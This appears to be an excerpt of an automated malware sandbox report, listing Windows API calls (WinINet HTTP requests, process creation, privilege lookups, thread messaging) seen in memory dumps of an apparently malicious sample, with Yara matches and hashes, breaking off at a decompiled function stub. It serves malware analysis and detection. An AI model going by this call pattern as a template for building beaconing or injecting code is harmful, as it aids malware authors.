• Opcode Fuzzy Hash: 8fd4ec5333189cee48dc5cd7e8cf2d5c581f12045e3b0da1303ead89e86a9d43
• Instruction Fuzzy Hash: AA90027134504C42F140715A4404A46001597D0349F51C011A0066694DDA65DD56B6A1
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
• Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp
• Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 111285dea24215243c402f7cccd96a3f3174bf983c01d52f8628142362502a3e
• Instruction ID: 3fd64ccb348ffbb47d005904d9b32518a6a294dca1232c7ab2b948040596cda1
• Opcode Fuzzy Hash: 111285dea24215243c402f7cccd96a3f3174bf983c01d52f8628142362502a3e
• Instruction Fuzzy Hash: 2790027135114802F110615A8404706000597D1245F51C411A0826558DCAD5D8927162
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
• Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp
• Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 0444b93f006a3755ed3211c774e8be6427b755e495f791577b1458bf8a137554
• Instruction ID: 6356b95611b4440e235348a1ae4e15c18acc923507d226b888da6ebbc4149362
• Opcode Fuzzy Hash: 0444b93f006a3755ed3211c774e8be6427b755e495f791577b1458bf8a137554
• Instruction Fuzzy Hash: DF90026935300402F180715A540860A000597D1246F91D415A0017558CCD55D86A6361
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
• Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp
• Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 6e7834480763b24e202a4cabc2b2c2ea51345b7b789dffe22dd0a08d328fd536
• Instruction ID: 239923df4a100db6e990b1c25e8fe1e5fe7b22222453e9b297465285e705e11f
• Opcode Fuzzy Hash: 6e7834480763b24e202a4cabc2b2c2ea51345b7b789dffe22dd0a08d328fd536
• Instruction Fuzzy Hash: BC90027134100802F100659A5408646000597E0345F51D011A5026555ECAA5D8927171
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
• Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp
• Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b472fe19f8ad93496ae2c0e8b039004c4aeafe0426ee41d8c32a9373adf804f0
• Instruction ID: 2218123fb3ecf2b4a507084b9dac071be2659d3f34aabebb7e8881fcbf83038e
• Opcode Fuzzy Hash: b472fe19f8ad93496ae2c0e8b039004c4aeafe0426ee41d8c32a9373adf804f0
• Instruction Fuzzy Hash: 8690027134100813F111615A4504707000997D0285F91C412A0426558DDA96D953B161
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
• Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp
• Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 272b1df77f8bb441d0e8de168650add7449c11652fdd6b8d29cbda5e1217c1bb
• Instruction ID: a38dc3ae14340d49f5b0fc8b467d9724bc8ef5b28cd81c32f02333add8420af1
• Opcode Fuzzy Hash: 272b1df77f8bb441d0e8de168650add7449c11652fdd6b8d29cbda5e1217c1bb
• Instruction Fuzzy Hash: DE900261382045527545B15A44045074006A7E0285791C012A1416950CC966E857E661
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
• Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp
• Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 201e524d778cbaa950525f12b216da789bd393bfd6a61d1ce5f82e79dfe41447
• Instruction ID: 575ed5d9aa34dee200597a3855f80e01466a2a0840d58401355137fa1aea0e2a
• Opcode Fuzzy Hash: 201e524d778cbaa950525f12b216da789bd393bfd6a61d1ce5f82e79dfe41447
• Instruction Fuzzy Hash: 9C9002A138100842F100615A4414B060005D7E1345F51C015E1066554DCA59DC537166
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
• Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp
• Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b9fba887b07f42adf1d1d54b9355b690068ba61bc4114a9a1cb6f10861024587
• Instruction ID: f179fcccebcf19bba5026a7d6f6a842ea0c82d91c96344142f1fc69ca27cf0a7
• Opcode Fuzzy Hash: b9fba887b07f42adf1d1d54b9355b690068ba61bc4114a9a1cb6f10861024587
• Instruction Fuzzy Hash: E99002B134100802F140715A4404746000597D0345F51C011A5066554ECA99DDD676A5
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
• Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp
• Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: ebb3809ac4480383dc8d5ff9e1709458423dd31f1547012fdc5d0f02f90f3eb5
• Instruction ID: a064034568e0481d9b979573e8a4bf10f219079c621f3c668cd5eedb6b1de66d
• Opcode Fuzzy Hash: ebb3809ac4480383dc8d5ff9e1709458423dd31f1547012fdc5d0f02f90f3eb5
• Instruction Fuzzy Hash: E090026135180442F200656A4C14B07000597D0347F51C115A0156554CCD55D8626561
Uniqueness
Uniqueness Score: -1.00%

APIs
• HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 00DA8938
Strings
Memory Dump Source
• Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
Yara matches
Similarity
• API ID: HttpOpenRequest
• String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
• API String ID: 1984915467-4016285707
• Opcode ID: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
• Instruction ID: 94c68b23e25758ca5701b703d8facf05d2df7787f5fec71724195d4c6f3c603f
• Opcode Fuzzy Hash: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
• Instruction Fuzzy Hash: F401E5B2A05159AFCB04DF98D841DEF7BB9EB48210F158288FD48A7205D630EE10CBE1
Uniqueness
Uniqueness Score: -1.00%

APIs
• HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 00DA8938
Strings
Memory Dump Source
• Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
Yara matches
Similarity
• API ID: HttpOpenRequest
• String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
• API String ID: 1984915467-4016285707
• Opcode ID: 40577d0d61336138bc75bac801066253a5c62ab29eefffa67608031ecb29e8ac
• Instruction ID: 4bf83242350e09ab38a02a4421890f57021f848e98a92b0194705b02128cd756
• Opcode Fuzzy Hash: 40577d0d61336138bc75bac801066253a5c62ab29eefffa67608031ecb29e8ac
• Instruction Fuzzy Hash: 9501D7B6905159ABCB14DF88C981DEF7BB9EF48350F158188FD48AB315D730AE118BA1
Uniqueness
Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00DA89AC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: HttpRequestSend
                                                                                    • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                                    • API String ID: 360639707-2503632690
                                                                                    • Opcode ID: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
                                                                                    • Instruction ID: d4c4cef6a96400695613f5abefaa867ee9ea34dfa78c72541e9a8f5315a857f0
                                                                                    • Opcode Fuzzy Hash: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
                                                                                    • Instruction Fuzzy Hash: A4014BB2905119AFCB00DF98D845AAFBBBCEB48210F148189FD08A7304D670EE10CBF2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00DA89AC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: HttpRequestSend
                                                                                    • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                                    • API String ID: 360639707-2503632690
                                                                                    • Opcode ID: 55845fd566111ad21366918098eff5cb6164c89f91251d9ce2bd53093292cd91
                                                                                    • Instruction ID: 1724b8c5366e9b9dfa0a50940fc1a853e06d5d13afce8466def2cbf9f01be176
                                                                                    • Opcode Fuzzy Hash: 55845fd566111ad21366918098eff5cb6164c89f91251d9ce2bd53093292cd91
                                                                                    • Instruction Fuzzy Hash: 55017CB2905109AFDB00DF88C841AAF7BB8EB59240F508148FD18AB304D670DE00CBF2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 00DA88B8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ConnectInternet
                                                                                    • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                                    • API String ID: 3050416762-1024195942
                                                                                    • Opcode ID: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
                                                                                    • Instruction ID: d1a1eeaef6e6d76a0ffc6ed079dfaa9ca43c37f4bd73321977556f339e35af8b
                                                                                    • Opcode Fuzzy Hash: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
                                                                                    • Instruction Fuzzy Hash: D2010CB2905118AFCB14DF99D941EEF77B9EB48310F154289FE08A7241D630EE10CBE1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 00DA88B8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ConnectInternet
                                                                                    • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                                    • API String ID: 3050416762-1024195942
                                                                                    • Opcode ID: 82f5ff5c5cbe2073e9236b952e3d370d6472ab244483b1843478c32671d2100a
                                                                                    • Instruction ID: e8a06be3612bd344b1d87e771f0389118ff5165a125adaff4d7b9dcef61e649c
                                                                                    • Opcode Fuzzy Hash: 82f5ff5c5cbe2073e9236b952e3d370d6472ab244483b1843478c32671d2100a
                                                                                    • Instruction Fuzzy Hash: 6D0129B2905119AFCB14DF99DD40EEF7BB9FF49350F158288BA48A7241C630AE11CBE1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00DA8837
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InternetOpen
                                                                                    • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                                    • API String ID: 2038078732-3155091674
                                                                                    • Opcode ID: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
                                                                                    • Instruction ID: 66d4004f2b66adab517a5751334d97202e53050edb027f959a7a7094b3075f94
                                                                                    • Opcode Fuzzy Hash: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
                                                                                    • Instruction Fuzzy Hash: 3DF019B2901118AF8B14DF98DC419EBB7B8FF48310B048589BE1897301D635AE10CBE1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00DA8837
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InternetOpen
                                                                                    • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                                    • API String ID: 2038078732-3155091674
                                                                                    • Opcode ID: b19e08ff7fd6ea0d40064051c8d38ae74b6ac2ad4a63c6a1664fe906beace06d
                                                                                    • Instruction ID: 66a1f035735ce33513d54f6e1bc593432a4ff4b929f3ac2624597d88fcb93e51
                                                                                    • Opcode Fuzzy Hash: b19e08ff7fd6ea0d40064051c8d38ae74b6ac2ad4a63c6a1664fe906beace06d
                                                                                    • Instruction Fuzzy Hash: D6F019B2901219AF8B14DF98D8419AB7BB8FF48300F048589BE1867346D734AA10CBE1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(000007D0), ref: 00DA6F88
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID: net.dll$wininet.dll
                                                                                    • API String ID: 3472027048-1269752229
                                                                                    • Opcode ID: dcdc39c7c6c693788b8ef11d0ded37d5dd7c33f95ecf2803788eda0e636ba227
                                                                                    • Instruction ID: 3afae40c45cbdc349b0c55ab91bd5cd1f5ef880eaface8ec088cc615b7eb8bdc
                                                                                    • Opcode Fuzzy Hash: dcdc39c7c6c693788b8ef11d0ded37d5dd7c33f95ecf2803788eda0e636ba227
                                                                                    • Instruction Fuzzy Hash: 28318FB1602704ABC715DF68D8A1FA7B7B8EF49700F04851DF61A9B241D770E545CBB0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(000007D0), ref: 00DA6F88
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID: net.dll$wininet.dll
                                                                                    • API String ID: 3472027048-1269752229
                                                                                    • Opcode ID: 29f1d006ad9d3f596608b8163a9e89bcf7be4a1d60b714708bffffb01765c3c3
                                                                                    • Instruction ID: 1a89789b1877422c3323d17ed6cb19a8a1620b0c15589645724482b25019d3c4
                                                                                    • Opcode Fuzzy Hash: 29f1d006ad9d3f596608b8163a9e89bcf7be4a1d60b714708bffffb01765c3c3
                                                                                    • Instruction Fuzzy Hash: 8621BDB1602300AFC710DF68D8A1FAABBB4EF49700F08806DF6199B241D370E545CBB0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00D93B93), ref: 00DA84FD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID: .z`
                                                                                    • API String ID: 3298025750-1441809116
                                                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                    • Instruction ID: 8416629027582beee0c276389bb1a981da8c289670a797d402af73d86ff9c20c
                                                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                    • Instruction Fuzzy Hash: C4E04FB12002046FDB14DF59CC45EA777ACEF88750F014554FD0857241CA30F910CAF0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00D972BA
                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00D972DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID:
                                                                                    • API String ID: 1836367815-0
                                                                                    • Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                                    • Instruction ID: 2e0e9a35ea9b68ccd44dc9d23e863d9fec2f364c2398f4c3f879ed5b1c557d33
                                                                                    • Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                                    • Instruction Fuzzy Hash: F701A231A9122876EB20A6949C43FFEB76C9B41B50F550119FF04BA1C1E6A46A0687F6
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00D972BA
                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00D972DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID:
                                                                                    • API String ID: 1836367815-0
                                                                                    • Opcode ID: a48fa8f18b87730ac951628d4debb36c2350a33053462d418bcc864ffe104e1f
                                                                                    • Instruction ID: ed81e986861e133c01e56bf8579887aa01831f35b2da50d43901be0802a94140
                                                                                    • Opcode Fuzzy Hash: a48fa8f18b87730ac951628d4debb36c2350a33053462d418bcc864ffe104e1f
                                                                                    • Instruction Fuzzy Hash: 2AF0E931AA52243AEB2457545C03FBEB758EB80B11F18412EFE84A91C1E695590586F5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00D9CCD0,?,?), ref: 00DA704C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 2422867632-0
                                                                                    • Opcode ID: a147266c3b11a3828ef28e38813cc07779aa21fca741a0448e6d1dbd002c37d9
                                                                                    • Instruction ID: ae19e6b922e90d53dfe559939eece48616924dafd8cd3fd3dfb6de307d3c3f7a
                                                                                    • Opcode Fuzzy Hash: a147266c3b11a3828ef28e38813cc07779aa21fca741a0448e6d1dbd002c37d9
                                                                                    • Instruction Fuzzy Hash: F94188B2201705AFD325DB64CCA2FE7B3A9EF86394F484919F51A96281D770B815CBB0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00D99B92
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0
                                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                    • Instruction ID: 5acfd4e4e1897bd97d1d4a9750df3c761671fea8fc8d68781fc93b820425f66b
                                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                    • Instruction Fuzzy Hash: BA011EB5D0020DABDF10DAA4EC92F9DB7B89B54308F044195A90897241F635EB14CBB1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00DA8594
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateInternalProcess
                                                                                    • String ID:
                                                                                    • API String ID: 2186235152-0
                                                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                    • Instruction ID: 00c71bf8af7a5e2626d0c34e80dfacfa87fae4fdcb3e5d73f1ca3ef25e4a8dde
                                                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                    • Instruction Fuzzy Hash: 9B01AFB2210108AFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241CA30E851CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,00D9CFA2,00D9CFA2,?,00000000,?,?), ref: 00DA8660
Memory Dump Source
• Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
• Opcode ID: f3d0d4816f2cdbc92c373190ca66973c238335d4b5fe0e9a71cc65d7bc131487
• Instruction ID: 0ea99d178af4ac96f3c9cf722974935666a351263fa09982a173f6029959e53b
• Opcode Fuzzy Hash: f3d0d4816f2cdbc92c373190ca66973c238335d4b5fe0e9a71cc65d7bc131487
• Instruction Fuzzy Hash: 9DF06DB62002486FDB24EFA5DC84EEB7BADEF89350F148659FD4D97641C931E9108BB0
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00D9CCD0,?,?), ref: 00DA704C
Memory Dump Source
• Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
• Instruction ID: 154f0d8c7dc20c04de97750535b783515002b6739dcf5687be6bb3d072491121
• Opcode Fuzzy Hash: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
• Instruction Fuzzy Hash: 63E092333903043AE33065999C03FA7B39DDB82B20F540026FB0DEB2C1D599F90142B8
Uniqueness
Uniqueness Score: -1.00%

APIs
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00D972DB
Memory Dump Source
• Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: ea492a0dd7fa0d4bcf416ebe9217e1cd75a044e1415e850f8fd52b4d56661e89
• Instruction ID: ddb9cd285b10cf91a84a1eb10144639fef7e13c9e766c30f44a77ff09348ec42
• Opcode Fuzzy Hash: ea492a0dd7fa0d4bcf416ebe9217e1cd75a044e1415e850f8fd52b4d56661e89
• Instruction Fuzzy Hash: 00E02B253A525429FB106799EC12FFE3788E763B52F88026EF9C4C62C2E585510D57F1
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00DA3516,?,00DA3C8F,00DA3C8F,?,00DA3516,?,?,?,?,?,00000000,00000000,?), ref: 00DA84BD
Memory Dump Source
• Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
• Instruction ID: 1e893e555dbf409c4cec9437d8c89a1161303cb8133fec4f04b14ca6dcde0f1b
• Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
• Instruction Fuzzy Hash: 57E012B1200208ABDB14EF99CC41EA777ACEF88650F118558FE085B282CA30F9108AB0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,00D9CFA2,00D9CFA2,?,00000000,?,?), ref: 00DA8660
Memory Dump Source
• Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
• Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
• Instruction ID: ec98957492427c93dfd10ed0e899b84aec0d4cf1e0db401ec627a0ed0bde494b
• Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
• Instruction Fuzzy Hash: 5DE01AB16002086BDB10DF59CC85EE737ADEF89650F018554FE0857241C930E8108BF5
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNELBASE(00008003,?,?,00D97C63,?), ref: 00D9D43B
Memory Dump Source
• Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
• Instruction ID: 02718a3d65ab92f5300575e4caf477e7a9fdae097a9e12ed195454aef32961af
• Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
• Instruction Fuzzy Hash: 51D0A7717503083BEB10FBA89C03F2672CD9B55B00F494064F949D73C3D964F5004571
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
• Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp
• Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 664e9463eb97b26c5efa9a490095c8c473584baf995525ae3d7eaa8b3bd71ec3
• Instruction ID: 7885085b840e7ae63a4fca60af42254be878645718b485aaabbf1d0beab1bab0
• Opcode Fuzzy Hash: 664e9463eb97b26c5efa9a490095c8c473584baf995525ae3d7eaa8b3bd71ec3
• Instruction Fuzzy Hash: F4B09BB1D414C5C5F715D7614608B17794077D0745F17C051D2031641B4778D096F5B5
Uniqueness
Uniqueness Score: -1.00%

Non-executed Functions

C-Code - Quality: 53%
E04FAFDDA(intOrPtr* __edx, intOrPtr _a4) {
	void* _t7;
	intOrPtr _t9;
